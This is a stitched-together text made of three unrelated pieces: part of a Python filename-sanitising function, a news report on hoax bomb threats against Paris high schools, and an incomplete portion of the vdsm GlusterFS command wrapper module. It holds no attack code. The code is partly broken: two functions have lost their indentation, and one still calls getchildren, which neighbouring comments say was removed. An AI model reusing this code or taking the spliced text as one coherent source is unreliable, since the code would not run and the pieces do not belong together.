            'hfs+', 'ntfs_win32', 'reiser4', 'reiserfs', 'xfs', 'zfs',
        },
        sanitization_method = 'underscore',
        truncate = True,
        replacement = '_',
        additional_illegal_characters=None,
    ):
    """Sanitize one path fragment so it is legal on every target file system.

    Replaces illegal characters with *replacement*, "quotes" Windows
    reserved names (CON, PRN, ...), optionally truncates to the strictest
    length limit, and strips a trailing dot/space where required.

    Fix: ``additional_illegal_characters`` previously defaulted to a
    mutable list (shared across calls); it now defaults to ``None`` and is
    normalized to a fresh list, which is backward compatible.

    Raises ValueError for non-text arguments, for a replacement that is
    itself illegal, for an unsanitizable trailing dot/space, or for an
    unknown sanitization_method.
    """
    if additional_illegal_characters is None:
        additional_illegal_characters = []
    else:
        additional_illegal_characters = list(additional_illegal_characters)

    # Enforce that these args are unicode strings
    unicode_args = [original_fragment, filename_extension, replacement] + additional_illegal_characters
    if not _are_unicode(unicode_args):
        raise ValueError(
            '`original_fragment`, `filename_extension`, `replacement`, and `additional_illegal_characters` '
            'must be of the unicode type under Python 2 or str type under Python 3.'
        )

    # A multi-character replacement can push the result past the length
    # limit enforced below; warn, but proceed.
    if len(replacement) > 1:
        warnings.warn(
            "The replacement is longer than one character. "
            "The length of the resulting string cannot be guaranteed to fit the target file systems' length limit.",
            ReplacementLengthWarning
        )

    sanitized_fragment = unicodedata.normalize('NFC', original_fragment)
    if len(filename_extension) > 0:
        filename_extension = unicodedata.normalize('NFC', '.' + filename_extension)

    if sanitization_method == 'underscore':
        illegal_characters = {
            'btrfs': {'\0', '/'},
            'ext': {'\0', '/'},
            'ext2': {'\0', '/'},
            'ext3': {'\0', '/'},
            'ext3cow': {'\0', '/', '@'},
            'ext4': {'\0', '/'},
            'exfat': {
                '\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
                '\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
                '/', '\\', ':', '*', '?', '"', '<', '>', '|',
            },
            'fat32': { # TODO: Confirm this list; current list is just a wild guess, assuming UTF-16 encoding.
                '\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
                '\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
                '/', '\\', ':', '*', '?', '"', '<', '>', '|',
            },
            # In theory, all Unicode characters, including NUL, are usable in HFS+; so this is just
            # a sane set for legacy compatibility - e.g. OS APIs that don't support '/' and ':'.
            'hfs+': {'\0', '/', ':'},
            'ntfs_win32': {'\0', '/', '\\', ':', '*', '?', '"', '<', '>', '|'}, # NTFS Win32 namespace (stricter)
            'ntfs_posix': {'\0', '/'}, # NTFS POSIX namespace (looser)
            'reiser4': {'\0', '/'},
            'reiserfs': {'\0', '/'},
            'xfs': {'\0', '/'},
            'zfs': {'\0', '/'},
            'additional_illegal_characters': set(additional_illegal_characters),
        }

        # Replace illegal characters with an underscore
        # `target_file_systems` is used further down, so we don't want to pollute it here.
        _temp_target_file_systems = set.union(target_file_systems, {'additional_illegal_characters'})
        illegal_character_set = set.union(*(illegal_characters[file_system] for file_system in _temp_target_file_systems))
        # It would be stupid if the replacement contains an illegal character.
        if any(character in replacement for character in illegal_character_set):
            raise ValueError('The replacement contains a character that would be illegal in the target file system(s).')
        for character in illegal_character_set:
            sanitized_fragment = sanitized_fragment.replace(character, replacement)
            filename_extension = filename_extension.replace(character, replacement)

        # "Quote" illegal filenames
        if target_file_systems.intersection({'fat32', 'ntfs_win32'}):
            windows_reserved_names = (
                "CON", "PRN", "AUX", "NUL",
                "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
                "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
            )
            if sanitized_fragment in windows_reserved_names:
                sanitized_fragment = replacement + sanitized_fragment + replacement
            if filename_extension in windows_reserved_names:
                filename_extension = replacement + filename_extension + replacement

        # Truncate if the resulting string is too long
        if truncate:
            max_lengths = {
                # For the entries of file systems commonly found with Linux, the length, 'utf-8',
                # and 'NFC' are only assumptions that apply to mostly vanilla kernels with default
                # build parameters.
                # If you add more file systems, see if it is affected by Unicode Normal Forms, like
                # HFS+; You may have to take extra care in editing the actual sanitization routine
                # below.
                'btrfs': (255, 'bytes', 'utf-8', 'NFC'),
                'ext': (255, 'bytes', 'utf-8', 'NFC'),
                'ext2': (255, 'bytes', 'utf-8', 'NFC'),
                'ext3': (255, 'bytes', 'utf-8', 'NFC'),
                'ext3cow': (255, 'bytes', 'utf-8', 'NFC'),
                'ext4': (255, 'bytes', 'utf-8', 'NFC'),
                'exfat': (255, 'characters', 'utf-16', 'NFC'),
                # 'utf-16' is not entirely true. FAT32 used to be used with codepages; but since
                # Windows XP, the default seems to be UTF-16.
                'fat32': (255, 'characters', 'utf-16', 'NFC'),
                # FIXME: improve HFS+ handling, because it does not use the standard NFD. It's
                # close, but it's not exactly the same thing.
                'hfs+': (255, 'characters', 'utf-16', 'NFD'),
                'ntfs_win32': (255, 'characters', 'utf-16', 'NFC'),
                'ntfs_posix': (255, 'characters', 'utf-16', 'NFC'),
                # ReiserFS 3 and 4 support filenames > 255 bytes. I don't care if the vanilla Linux
                # kernel can't support that. That's Linux's problem, not mine.
                'reiser4': (3976, 'bytes', 'utf-8', 'NFC'),
                'reiserfs': (4032, 'bytes', 'utf-8', 'NFC'),
                'xfs': (255, 'bytes', 'utf-8', 'NFC'),
                'zfs': (255, 'bytes', 'utf-8', 'NFC'),
            }
            for file_system in target_file_systems:
                if max_lengths[file_system][1] == 'bytes':
                    # Accumulate characters until the encoded length (plus the
                    # extension's) would exceed the limit.
                    extension_bytes = unicodedata.normalize(max_lengths[file_system][3], filename_extension).encode(max_lengths[file_system][2])
                    temp_fragment = bytearray()
                    for character in sanitized_fragment:
                        encoded_bytes = unicodedata.normalize(max_lengths[file_system][3], character).encode(max_lengths[file_system][2])
                        if len(temp_fragment) + len(encoded_bytes) + len(extension_bytes) <= max_lengths[file_system][0]:
                            temp_fragment = temp_fragment + encoded_bytes
                        else:
                            break
                    sanitized_fragment = unicodedata.normalize('NFC', temp_fragment.decode(max_lengths[file_system][2]))
                else: # Assume 'characters'
                    temp_fragment = ''
                    # HFS+ decomposes per Unicode 3.2, not the current standard.
                    if file_system == 'hfs+':
                        normalize = unicodedata.ucd_3_2_0.normalize
                    else:
                        normalize = unicodedata.normalize
                    normalized_extension = normalize(max_lengths[file_system][3], filename_extension)
                    for character in sanitized_fragment:
                        normalized_character = normalize(max_lengths[file_system][3], character)
                        if len(temp_fragment) + len(normalized_character) + len(normalized_extension) <= max_lengths[file_system][0]:
                            temp_fragment += normalized_character
                        else:
                            break
                    sanitized_fragment = unicodedata.normalize('NFC', temp_fragment)
        sanitized_fragment = sanitized_fragment + filename_extension

        # Disallow a final dot or space for FAT32 and NTFS in Win32 namespace.
        # This can only be done after truncations because otherwise we may fix the fragment, but
        # still end up with a bad ending character once it's truncated
        if (
            target_file_systems.intersection({'fat32', 'ntfs_win32'}) and
            (sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' '))
        ):
            if replacement.endswith('.') or replacement.endswith(' '):
                raise ValueError(
                    'The sanitized string ends with a dot or space, and the replacement also ends with a dot or space. '
                    'Therefore the string cannot be sanitized for fat32 or ntfs_win32.'
                )
            while (sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' ')):
                sanitized_fragment = sanitized_fragment[:-1] + replacement
    else:
        raise ValueError("sanitization_method must be a valid sanitization method.")

    return sanitized_fragment
|
At least five Paris high schools were evacuated on Thursday morning after bomb threats were made for the second time this week.
The affected high schools were Louis-le-Grand (5th arrondissement), Charlemagne (4th), Condorcet (9th), Hélène Boucher (20th) and Victor-Hugo (3rd).
The caller said that they would arrive at the schools armed with "bombs and Kalashnikovs to get the maximum amount of victims," reported Le Parisien newspaper.
This tweet from the Paris education authority Academie de Paris says police are securing the five schools mentioned above, adding that the students have been taken to a safe location.
Charlemagne, Louis le Grand, and Condorcet were all hit by similar threats on Tuesday, when a total of six high schools in Paris were evacuated after anonymous calls were made claiming bombs had been hidden in the buildings.
With Paris still on high alert after the November terror attacks Tuesday's threats were taken seriously.
Also on Tuesday, 14 schools in Britain were evacuated following hoax bomb threats.
Those threats were claimed by a Twitter account calling itself the Evacuation Squad, with a profile picture of Russian President Vladimir Putin.
The account featured previous messages in support of Syrian President Bashar al-Assad.
"We are 6 individuals based internationally," reads the profile blurb, advertising its services to call in bomb threats.
|
#
# Copyright 2012-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import absolute_import
import calendar
import logging
import os
import socket
import time
import xml.etree.cElementTree as etree
from vdsm.common import cmdutils
from vdsm import commands
from vdsm.gluster import exception as ge
from vdsm.network.netinfo import addresses
from . import gluster_mgmt_api, gluster_api
# Locator for the gluster CLI binary (resolved via cmdutils.CommandPath).
_glusterCommandPath = cmdutils.CommandPath("gluster",
                                           "/usr/sbin/gluster",
                                           )
# Name of the local non-DST time zone.
_TIME_ZONE = time.tzname[0]
# etree.ParseError only exists on newer ElementTree versions; older ones
# raise SyntaxError instead, so pick the matching exception tuple once.
if hasattr(etree, 'ParseError'):
    _etreeExceptions = (etree.ParseError, AttributeError, ValueError)
else:
    _etreeExceptions = (SyntaxError, AttributeError, ValueError)
def _getGlusterVolCmd():
    """Base argv for non-interactive `gluster volume` invocations."""
    cli = _glusterCommandPath.cmd
    return [cli, "--mode=script", "volume"]
def _getGlusterPeerCmd():
    """Base argv for non-interactive `gluster peer` invocations."""
    cli = _glusterCommandPath.cmd
    return [cli, "--mode=script", "peer"]
def _getGlusterSystemCmd():
    """Base argv for `gluster system::` invocations (no script mode)."""
    cli = _glusterCommandPath.cmd
    return [cli, "system::"]
def _getGlusterVolGeoRepCmd():
    """Base argv for `gluster volume geo-replication` invocations."""
    argv = _getGlusterVolCmd()
    argv.append("geo-replication")
    return argv
def _getGlusterSnapshotCmd():
    """Base argv for non-interactive `gluster snapshot` invocations."""
    cli = _glusterCommandPath.cmd
    return [cli, "--mode=script", "snapshot"]
class BrickStatus:
    # Symbolic constants for brick status values.
    PAUSED = 'PAUSED'
    COMPLETED = 'COMPLETED'
    RUNNING = 'RUNNING'
    UNKNOWN = 'UNKNOWN'
    NA = 'NA'
class HostStatus:
    # Symbolic constants for peer/host connection states.
    CONNECTED = 'CONNECTED'
    DISCONNECTED = 'DISCONNECTED'
    UNKNOWN = 'UNKNOWN'
class VolumeStatus:
    # Symbolic constants for volume online/offline states.
    ONLINE = 'ONLINE'
    OFFLINE = 'OFFLINE'
class TransportType:
    # Symbolic constants for volume transport types.
    TCP = 'TCP'
    RDMA = 'RDMA'
class TaskType:
    # Symbolic constants for asynchronous volume task types.
    REBALANCE = 'REBALANCE'
    REPLACE_BRICK = 'REPLACE_BRICK'
    REMOVE_BRICK = 'REMOVE_BRICK'
class SnapshotStatus:
    # Symbolic constants for snapshot activation states.
    ACTIVATED = 'ACTIVATED'
    DEACTIVATED = 'DEACTIVATED'
def _execGluster(cmd):
    # Thin wrapper around commands.execCmd; callers unpack its result as
    # (rc, out, err) -- see hostUUIDGet below.
    return commands.execCmd(cmd)
def _execGlusterXml(cmd):
    """Run a gluster command with --xml and return the parsed reply tree.

    Appends '--xml' to *cmd* (mutating the caller's list, as before) and
    executes it.  Raises GlusterCmdExecFailedException when the process
    exits non-zero, GlusterXmlErrorException when the reply cannot be
    parsed, and GlusterCmdFailedException when the reply itself reports
    a failure (opRet != 0).
    """
    cmd.append('--xml')
    rc, out, err = commands.execCmd(cmd)
    if rc != 0:
        raise ge.GlusterCmdExecFailedException(rc, out, err)
    try:
        tree = etree.fromstring('\n'.join(out))
        opRet = int(tree.find('opRet').text)
        opErrstr = tree.find('opErrstr').text
        opErrno = int(tree.find('opErrno').text)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=out)
    if opRet == 0:
        return tree
    # Prefer the dedicated errno when present; fall back to opRet.
    errCode = opErrno if opErrno != 0 else opRet
    raise ge.GlusterCmdFailedException(rc=errCode, err=[opErrstr])
def _getLocalIpAddress():
    """First non-loopback IP of this host, or '' when none is found."""
    for address in addresses.getIpAddresses():
        if address.startswith('127.'):
            continue
        return address
    return ''
def _getGlusterHostName():
try:
return socket.getfqdn()
except socket.herror:
logging.exception('getfqdn')
return ''
@gluster_mgmt_api
def hostUUIDGet():
    """Return this host's gluster UUID via `gluster system:: uuid get`.

    Raises GlusterHostUUIDNotFoundException when the command fails or no
    'UUID: ' line is present in its output.
    """
    argv = _getGlusterSystemCmd() + ["uuid", "get"]
    rc, out, err = _execGluster(argv)
    if rc == 0:
        for line in out:
            if line.startswith('UUID: '):
                # Strip the 'UUID: ' prefix (6 characters).
                return line[6:]
    raise ge.GlusterHostUUIDNotFoundException()
def _parseVolumeStatus(tree):
    """Parse `gluster volume status <vol> --xml` output into a dict.

    Returns {'name': ..., 'bricks': [...], 'nfs': [...], 'shd': [...]},
    splitting each <node> element into the NFS-server, self-heal-daemon
    or brick bucket based on its hostname field.

    Fix: Element.getchildren() is deprecated and was removed in
    Python 3.9; iterate the element directly instead (works on all
    supported Python versions).
    """
    status = {'name': tree.find('volStatus/volumes/volume/volName').text,
              'bricks': [],
              'nfs': [],
              'shd': []}
    hostname = _getLocalIpAddress() or _getGlusterHostName()
    for el in tree.findall('volStatus/volumes/volume/node'):
        value = {}
        for ch in el:
            value[ch.tag] = ch.text or ''
        ports = {}
        for ch in el.find('ports'):
            ports[ch.tag] = ch.text or ''
        # gluster reports the local node as 'localhost'; substitute a
        # name/IP that is meaningful to remote callers.
        if value['path'] == 'localhost':
            value['path'] = hostname
        if value['status'] == '1':
            value['status'] = 'ONLINE'
        else:
            value['status'] = 'OFFLINE'
        if value['hostname'] == 'NFS Server':
            status['nfs'].append({'hostname': value['path'],
                                  'hostuuid': value['peerid'],
                                  'port': ports['tcp'],
                                  'rdma_port': ports['rdma'],
                                  'status': value['status'],
                                  'pid': value['pid']})
        elif value['hostname'] == 'Self-heal Daemon':
            status['shd'].append({'hostname': value['path'],
                                  'hostuuid': value['peerid'],
                                  'status': value['status'],
                                  'pid': value['pid']})
        else:
            status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
                                                         value['path']),
                                     'hostuuid': value['peerid'],
                                     'port': ports['tcp'],
                                     'rdma_port': ports['rdma'],
                                     'status': value['status'],
                                     'pid': value['pid']})
    return status
def _parseVolumeStatusDetail(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
sizeTotal = int(value['sizeTotal'])
value['sizeTotal'] = sizeTotal / (1024.0 * 1024.0)
sizeFree = int(value['sizeFree'])
value['sizeFree'] = sizeFree / (1024.0 * 1024.0)
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'sizeTotal': '%.3f' % (value['sizeTotal'],),
'sizeFree': '%.3f' % (value['sizeFree'],),
'device': value['device'],
'blockSize': value['blockSize'],
'mntOptions': value['mntOptions'],
'fsName': value['fsName']})
return status
def _parseVolumeStatusClients(tree):
    """Parse ``volume status <vol> clients`` XML output.

    Returns {'name': VOLNAME,
             'bricks': [{'brick', 'hostuuid',
                         'clientsStatus': [{'hostname', 'bytesRead',
                                            'bytesWrite'}, ...]}, ...]}
    """
    status = {'name': tree.find('volStatus/volumes/volume/volName').text,
              'bricks': []}
    for el in tree.findall('volStatus/volumes/volume/node'):
        hostname = el.find('hostname').text
        path = el.find('path').text
        hostuuid = el.find('peerid').text
        clientsStatus = []
        for c in el.findall('clientsStatus/client'):
            clientValue = {}
            # Element.getchildren() was removed in Python 3.9; iterate
            # the element directly instead
            for ch in c:
                clientValue[ch.tag] = ch.text or ''
            clientsStatus.append({'hostname': clientValue['hostname'],
                                  'bytesRead': clientValue['bytesRead'],
                                  'bytesWrite': clientValue['bytesWrite']})
        status['bricks'].append({'brick': '%s:%s' % (hostname, path),
                                 'hostuuid': hostuuid,
                                 'clientsStatus': clientsStatus})
    return status
def _parseVolumeStatusMem(tree):
    """Parse ``volume status <vol> mem`` XML output.

    Returns {'name': VOLNAME,
             'bricks': [{'brick', 'hostuuid',
                         'mallinfo': {tag: text, ...},
                         'mempool': [{tag: text, ...}, ...]}, ...]}
    """
    status = {'name': tree.find('volStatus/volumes/volume/volName').text,
              'bricks': []}
    for el in tree.findall('volStatus/volumes/volume/node'):
        brick = {'brick': '%s:%s' % (el.find('hostname').text,
                                     el.find('path').text),
                 'hostuuid': el.find('peerid').text,
                 'mallinfo': {},
                 'mempool': []}
        # Element.getchildren() was removed in Python 3.9; iterate directly
        for ch in el.find('memStatus/mallinfo'):
            brick['mallinfo'][ch.tag] = ch.text or ''
        for c in el.findall('memStatus/mempool/pool'):
            mempool = {}
            for ch in c:
                mempool[ch.tag] = ch.text or ''
            brick['mempool'].append(mempool)
        status['bricks'].append(brick)
    return status
@gluster_mgmt_api
def volumeStatus(volumeName, brick=None, option=None):
    """Run ``gluster volume status`` and return the parsed result.

    Arguments:
        volumeName: name of the volume to query
        brick: optional brick to restrict the query to
        option: None (plain status), 'detail', 'clients' or 'mem'

    Returns a dict whose shape depends on option:
        None      -> {'name', 'bricks': [...], 'nfs': [...], 'shd': [...]}
                     (per-brick port/rdma_port/status/pid entries)
        'detail'  -> {'name', 'bricks': [...]} with size/device/mount info
        'clients' -> {'name', 'bricks': [...]} with per-client byte counters
        'mem'     -> {'name', 'bricks': [...]} with mallinfo and mempool
                     statistics per brick

    Raises GlusterVolumeStatusFailedException when the CLI fails and
    GlusterXmlErrorException when its XML cannot be parsed.
    """
    cmd = _getGlusterVolCmd() + ["status", volumeName]
    if brick:
        cmd.append(brick)
    if option:
        cmd.append(option)
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeStatusFailedException(rc=e.rc, err=e.err)
    # pick the parser matching the requested status flavour
    parsers = {'detail': _parseVolumeStatusDetail,
               'clients': _parseVolumeStatusClients,
               'mem': _parseVolumeStatusMem}
    parse = parsers.get(option, _parseVolumeStatus)
    try:
        return parse(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeInfo(tree):
    """Parse ``gluster volume info`` XML output.

    Returns:
    {VOLUMENAME: {'brickCount': BRICKCOUNT,
                  'bricks': [BRICK1, BRICK2, ...],
                  'options': {OPTION: VALUE, ...},
                  'transportType': [TCP,RDMA, ...],
                  'uuid': UUID,
                  'volumeName': NAME,
                  'volumeStatus': STATUS,
                  'volumeType': TYPE,
                  'disperseCount': DISPERSE_COUNT,
                  'redundancyCount': REDUNDANCY_COUNT,
                  'isArbiter': [True/False]}, ...}
    """
    volumes = {}
    for volumeEl in tree.findall('volInfo/volumes/volume'):
        info = {
            'volumeName': volumeEl.find('name').text,
            'uuid': volumeEl.find('id').text,
            'volumeType': volumeEl.find(
                'typeStr').text.upper().replace('-', '_'),
            'brickCount': volumeEl.find('brickCount').text,
            'distCount': volumeEl.find('distCount').text,
            'stripeCount': volumeEl.find('stripeCount').text,
            'replicaCount': volumeEl.find('replicaCount').text,
            'disperseCount': volumeEl.find('disperseCount').text,
            'redundancyCount': volumeEl.find('redundancyCount').text,
            'isArbiter': volumeEl.find('arbiterCount').text == '1',
        }
        if volumeEl.find('statusStr').text.upper() == 'STARTED':
            info["volumeStatus"] = VolumeStatus.ONLINE
        else:
            info["volumeStatus"] = VolumeStatus.OFFLINE
        transport = volumeEl.find('transport').text
        if transport == '0':
            info['transportType'] = [TransportType.TCP]
        elif transport == '1':
            info['transportType'] = [TransportType.RDMA]
        else:
            info['transportType'] = [TransportType.TCP, TransportType.RDMA]
        info['bricks'] = [b.text for b in volumeEl.findall('bricks/brick')]
        info['options'] = dict(
            (o.find('name').text, o.find('value').text)
            for o in volumeEl.findall('options/option'))
        info['bricksInfo'] = []
        for brickEl in volumeEl.findall('bricks/brick'):
            # this try block is to maintain backward compatibility:
            # older gluster does not emit hostUuid/isArbiter, in which
            # case bricksInfo stays an empty list
            try:
                brickDetail = {
                    'name': brickEl.find('name').text,
                    'hostUuid': brickEl.find('hostUuid').text,
                    'isArbiter': brickEl.find('isArbiter').text == '1'}
                info['bricksInfo'].append(brickDetail)
            except AttributeError:
                break
        volumes[info['volumeName']] = info
    return volumes
def _parseVolumeProfileInfo(tree, nfs):
    """Parse ``volume profile <vol> info`` XML output.

    When nfs is True the result is keyed 'nfsServers'/'nfs', otherwise
    'bricks'/'brick'. Each entry carries cumulative and interval block
    and fop statistics for one brick (or NFS server).
    """
    if nfs:
        brickKey, bricksKey = 'nfs', 'nfsServers'
    else:
        brickKey, bricksKey = 'brick', 'bricks'

    def _blockStats(statsEl):
        # per-block-size read/write counters
        return [{'size': b.find('size').text,
                 'read': b.find('reads').text,
                 'write': b.find('writes').text}
                for b in statsEl.findall('blockStats/block')]

    def _fopStats(statsEl):
        # per-file-operation hit counts and latencies
        return [{'name': f.find('name').text,
                 'hits': f.find('hits').text,
                 'latencyAvg': f.find('avgLatency').text,
                 'latencyMin': f.find('minLatency').text,
                 'latencyMax': f.find('maxLatency').text}
                for f in statsEl.findall('fopStats/fop')]

    def _stats(statsEl):
        return {'blockStats': _blockStats(statsEl),
                'fopStats': _fopStats(statsEl),
                'duration': statsEl.find('duration').text,
                'totalRead': statsEl.find('totalRead').text,
                'totalWrite': statsEl.find('totalWrite').text}

    bricks = []
    for brick in tree.findall('volProfile/brick'):
        brickName = brick.find('brickName').text
        if brickName == 'localhost':
            # substitute a resolvable name for the local host
            brickName = _getLocalIpAddress() or _getGlusterHostName()
        bricks.append(
            {brickKey: brickName,
             'cumulativeStats': _stats(brick.find('cumulativeStats')),
             'intervalStats': _stats(brick.find('intervalStats'))})
    return {'volumeName': tree.find("volProfile/volname").text,
            bricksKey: bricks}
@gluster_api
@gluster_mgmt_api
def volumeInfo(volumeName=None, remoteServer=None):
    """Run ``gluster volume info`` (optionally against a remote host).

    Returns:
    {VOLUMENAME: {'brickCount': BRICKCOUNT,
                  'bricks': [BRICK1, BRICK2, ...],
                  'options': {OPTION: VALUE, ...},
                  'transportType': [TCP,RDMA, ...],
                  'uuid': UUID,
                  'volumeName': NAME,
                  'volumeStatus': STATUS,
                  'volumeType': TYPE}, ...}
    """
    cmd = _getGlusterVolCmd() + ["info"]
    if remoteServer:
        cmd.append('--remote-host=%s' % remoteServer)
    if volumeName:
        cmd.append(volumeName)
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumesListFailedException(rc=e.rc, err=e.err)
    try:
        return _parseVolumeInfo(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeCreate(volumeName, brickList, replicaCount=0, stripeCount=0,
                 transportList=None, force=False, arbiter=False):
    """Create a gluster volume; returns {'uuid': <new volume id>}.

    transportList previously defaulted to a shared mutable list ([]);
    None is behaviorally equivalent (both are falsy, the list is never
    mutated) and avoids the mutable-default-argument pitfall.
    """
    command = _getGlusterVolCmd() + ["create", volumeName]
    if stripeCount:
        command += ["stripe", "%s" % stripeCount]
    if replicaCount:
        command += ["replica", "%s" % replicaCount]
    if arbiter:
        command += ["arbiter", "1"]
    if transportList:
        command += ["transport", ','.join(transportList)]
    command += brickList
    if force:
        command.append('force')
    try:
        xmltree = _execGlusterXml(command)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeCreateFailedException(rc=e.rc, err=e.err)
    try:
        return {'uuid': xmltree.find('volCreate/volume/id').text}
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeStart(volumeName, force=False):
    """Start the given volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["start", volumeName]
    if force:
        cmd.append('force')
    rc, out, err = _execGluster(cmd)
    if not rc:
        return True
    raise ge.GlusterVolumeStartFailedException(rc, out, err)
@gluster_mgmt_api
def volumeStop(volumeName, force=False):
    """Stop the given volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["stop", volumeName]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeStopFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeDelete(volumeName):
    """Delete the given volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["delete", volumeName]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeDeleteFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeSet(volumeName, option, value):
    """Set a volume option; returns True on success."""
    cmd = _getGlusterVolCmd() + ["set", volumeName, option, value]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeSetFailedException(rc=e.rc, err=e.err)
    return True
def _parseVolumeSetHelpXml(out):
    """Parse ``volume set help-xml`` output lines.

    Returns a list of {tag: text} dicts, one per <option> element.
    """
    tree = etree.fromstring('\n'.join(out))
    optionList = []
    for el in tree.findall('option'):
        # Element.getchildren() was removed in Python 3.9; iterate directly
        option = {}
        for ch in el:
            option[ch.tag] = ch.text or ''
        optionList.append(option)
    return optionList
@gluster_mgmt_api
def volumeSetHelpXml():
    """Return the parsed list of settable volume options."""
    rc, out, err = _execGluster(_getGlusterVolCmd() + ["set", 'help-xml'])
    if not rc:
        return _parseVolumeSetHelpXml(out)
    raise ge.GlusterVolumeSetHelpXmlFailedException(rc, out, err)
@gluster_mgmt_api
def volumeReset(volumeName, option='', force=False):
    """Reset one option (or all options) of a volume; returns True."""
    cmd = _getGlusterVolCmd() + ['reset', volumeName]
    if option:
        cmd.append(option)
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeResetFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeAddBrick(volumeName, brickList,
                   replicaCount=0, stripeCount=0, force=False):
    """Add bricks to a volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["add-brick", volumeName]
    if stripeCount:
        cmd += ["stripe", "%s" % stripeCount]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeBrickAddFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeRebalanceStart(volumeName, rebalanceType="", force=False):
    """Start a rebalance; returns {'taskId': <gluster task id>}."""
    cmd = _getGlusterVolCmd() + ["rebalance", volumeName]
    if rebalanceType:
        cmd.append(rebalanceType)
    cmd.append("start")
    if force:
        cmd.append("force")
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRebalanceStartFailedException(rc=e.rc,
                                                            err=e.err)
    try:
        return {'taskId': xmltree.find('volRebalance/task-id').text}
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRebalanceStop(volumeName, force=False):
    """Stop a running rebalance; returns the parsed final status."""
    cmd = _getGlusterVolCmd() + ["rebalance", volumeName, "stop"]
    if force:
        cmd.append('force')
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRebalanceStopFailedException(rc=e.rc,
                                                           err=e.err)
    try:
        return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def _parseVolumeRebalanceRemoveBrickStatus(xmltree, mode):
    """Parse rebalance / remove-brick status XML.

    NOTE(review): the management-API decorator on this private parser looks
    accidental -- confirm before removing it.

    returns {'hosts': [{'name', 'id', 'runtime', 'filesScanned',
                        'filesMoved', 'filesFailed', 'filesSkipped',
                        'totalSizeMoved', 'status'}, ...],
             'summary': {'runtime', 'filesScanned', 'filesMoved',
                         'filesFailed', 'filesSkipped', 'totalSizeMoved',
                         'status'}}
    Returns None for an unrecognised mode.
    """
    roots = {'rebalance': 'volRebalance', 'remove-brick': 'volRemoveBrick'}
    if mode not in roots:
        return
    tree = xmltree.find(roots[mode])

    def _normalize(text):
        # 'in progress' / 'fix-layout' style strings -> IN_PROGRESS, ...
        return text.replace(' ', '_').replace('-', '_').upper()

    summary = {'runtime': tree.find('aggregate/runtime').text,
               'filesScanned': tree.find('aggregate/lookups').text,
               'filesMoved': tree.find('aggregate/files').text,
               'filesFailed': tree.find('aggregate/failures').text,
               'filesSkipped': tree.find('aggregate/skipped').text,
               'totalSizeMoved': tree.find('aggregate/size').text,
               'status': _normalize(tree.find('aggregate/statusStr').text)}
    hosts = []
    for el in tree.findall('node'):
